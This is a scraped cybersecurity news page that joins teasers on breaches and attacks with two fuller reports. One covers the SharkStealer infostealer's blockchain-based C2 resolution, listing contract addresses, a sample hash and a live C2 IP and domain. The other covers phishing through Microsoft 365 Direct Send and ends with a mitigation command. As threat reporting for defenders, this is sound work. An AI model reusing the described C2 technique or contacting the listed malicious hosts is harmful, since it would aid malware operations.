Toys “R” Us Canada has alerted its customers to a significant data breach that may have compromised personal information. The company sent notification emails to affected customers on Thursday morning, confirming that unauthorized access to their databases occurred. According to the notification, the toy retailer discovered the breach after learning on July 30 that someone […]
Socket’s Threat Research Team has uncovered a sophisticated supply chain attack targeting cryptocurrency developers through the NuGet package registry. The malicious packages, which exfiltrate sensitive wallet data including private keys and mnemonics, highlight a critical vulnerability in package registry security practices. The attack centers on a package named Netherеum.All, which appears identical to the legitimate […]
Microsoft has rolled out a significant security enhancement to Windows File Explorer, automatically disabling the preview pane for files downloaded from the internet as part of security updates released on and after October 14, 2025. This proactive measure targets a long-standing vulnerability that attackers have exploited to harvest NTLM hashes and sensitive credentials used for […]
Cybersecurity researchers have discovered a self-propagating worm that spreads via Visual Studio Code (VS Code) extensions on the Open VSX Registry and the Microsoft Extension Marketplace, underscoring how developers have become a prime target for attacks.
The sophisticated threat, codenamed GlassWorm by Koi Security, is the second such supply chain attack to hit the DevOps space within a span
A sophisticated information-stealing malware written in Golang has emerged, leveraging blockchain technology to establish covert command-and-control channels.
SharkStealer represents a significant evolution in malware design, utilizing the BNB Smart Chain Testnet as a resilient dead-drop resolver for its C2 infrastructure.
This novel approach demonstrates how threat actors exploit Web3 technologies to evade traditional detection mechanisms and maintain persistent communication channels.
The malware employs an innovative technique known as EtherHiding, where critical infection chain components are stored on public blockchains rather than conventional web servers.
This method transforms immutable blockchain networks into censorship-resistant infrastructure that defenders struggle to disrupt or monitor effectively.
By embedding C2 addresses within smart contract responses, SharkStealer creates a distributed communication layer that remains operational even when traditional domains or IP addresses are blocked.
SharkStealer’s attack vector centers on leveraging the transparency and availability of public blockchain networks while maintaining operational security through encryption.
VMRay analysts identified that the malware issues Ethereum RPC eth_call requests to specific smart contracts deployed on the BSC Testnet nodes.
These contracts serve as encrypted data repositories, returning tuples containing an initialization vector (IV) and encrypted payload when queried.
The malware then decrypts this data using a hardcoded AES-CFB key embedded within the binary, ultimately extracting the actual C2 server addresses.
Technical Analysis of C2 Resolution
The infection mechanism operates through a multi-stage process that begins with establishing a secure connection to data-seed-prebsc-2-s1.binance.org:8545, the BSC Testnet RPC endpoint.
The code snippet below illustrates how SharkStealer constructs the JSON-RPC request:-
Smart Contract Request Construction (Source – VMRay)
The malware’s C2 resolution mechanism demonstrates sophisticated engineering combining blockchain interaction with traditional cryptographic techniques.
Once the eth_call request reaches target smart contract addresses—specifically 0xc2c25784E78AeE4C2Cb16d40358632Ed27eeaF8E and 0x3dd7a9c28cfedf1c462581eb7150212bcf3f9edf—the contracts execute function 0x24c12bf6, returning encrypted C2 data.
The decryption process utilizes AES-CFB mode, combining the hardcoded key with the dynamically retrieved IV to decrypt the payload.
Analysis of sample SHA-256 hash 3d54cbbab911d09ecaec19acb292e476b0073d14e227d79919740511109d9274 revealed active C2 servers at 84.54.44.48 and securemetricsapi.live, demonstrating the technique’s operational effectiveness.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Check Point Research has uncovered a massive malware distribution operation called the YouTube Ghost Network, featuring over 3,000 malicious videos designed to infect unsuspecting users with dangerous information-stealing malware. This sophisticated cybercriminal network has been operating since at least 2021, with activity tripling in 2025 as threat actors increasingly exploit YouTube’s trusted platform to bypass […]
A critical zero-day vulnerability in Samsung’s flagship Galaxy S25 smartphone was successfully exploited at Pwn2Own Ireland 2025, demonstrating how attackers could silently activate the device’s camera and track a user’s real-time location. Security researchers Ben R. and Georgi G. from Interrupt Labs revealed the sophisticated exploit during the competition’s final day, earning $50,000 in prize […]
Microsoft 365 Exchange Online’s Direct Send feature, originally designed to enable legacy devices and applications to send emails without authentication, has become an exploitable pathway for cybercriminals conducting sophisticated phishing and business email compromise attacks.
The feature allows multifunction printers, scanners, and older line-of-business applications to transmit messages by bypassing rigorous authentication and security checks, creating an operational convenience that adversaries have weaponized to circumvent standard content filters and domain verification protocols.
Recent investigations reveal a surge in malicious campaigns exploiting Direct Send to deliver fraudulent messages that appear to originate from trusted internal sources.
Threat actors emulate legitimate device traffic and send unauthenticated emails impersonating executives, IT help desks, and internal users.
These campaigns frequently employ business-themed social engineering lures, including task approvals, voicemail notifications, and payment prompts designed to manipulate recipients into divulging credentials or sensitive information.
Cisco Talos analysts identified increased activity by malicious actors leveraging Direct Send as part of coordinated phishing campaigns and BEC attacks.
Security researchers from multiple organizations, including Varonis, Abnormal Security, Ironscales, Proofpoint, Barracuda, and Mimecast, have independently confirmed similar findings, indicating that adversaries have actively targeted corporations using Direct Send in recent months.
Direct Send Exploitation
The attacks exploit the feature’s ability to inherit implicit trust from Exchange infrastructure, decreasing payload scrutiny and enabling messages to bypass critical sender verification mechanisms.
The exploitation technique centers on circumventing three fundamental email authentication protocols: DomainKeys-Identified Mail (DKIM), Sender Policy Framework (SPF), and Domain-based Message Authentication, Reporting and Conformance (DMARC).
Spoofed American Express dispute (left), fake ACH payment notice (right) (Source – Cisco Talos)
Under normal circumstances, these protocols verify message authenticity through cryptographic signatures, authorized IP ranges, and policy enforcement.
However, Direct Send prevents this inspection, allowing spoofed messages to reach recipients unchallenged.
Attackers have embedded QR codes within PDFs and crafted empty-body messages with obfuscated attachments, successfully evading traditional content filters and directing victims to credential harvesting pages.
Microsoft has responded by introducing a Public Preview of the RejectDirectSend control and announcing future enhancements, including Direct Send-specific usage reports and a default-off configuration for new tenants.
Organizations can mitigate risks by disabling Direct Send where feasible using the command Set-OrganizationConfig -RejectDirectSend $true after validating legitimate mail flows, migrating devices to authenticated SMTP submission on port 587, and implementing tightly scoped IP restrictions for devices unable to authenticate properly.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Security researchers have discovered a sophisticated method that allows attackers to steal access tokens from Microsoft Teams, potentially granting unauthorized access to sensitive corporate communications, emails, and SharePoint documents. The attack vector represents a significant security risk for organizations relying on Microsoft’s productivity suite, as stolen tokens can be weaponized for lateral movement within company […]
A new phishing campaign is targeting Microsoft account holders by using a clever twist on OAuth authentication prompts. Instead of asking users to hand over their passwords directly, attackers are tricking people into granting permission to malicious applications through legitimate-looking Microsoft authorization screens. This method bypasses traditional password protection and multi-factor authentication, making it particularly […]
.webp)
,%20fake%20ACH%20payment%20notice%20(right)%20(Source%20-%20Cisco%20Talos).webp)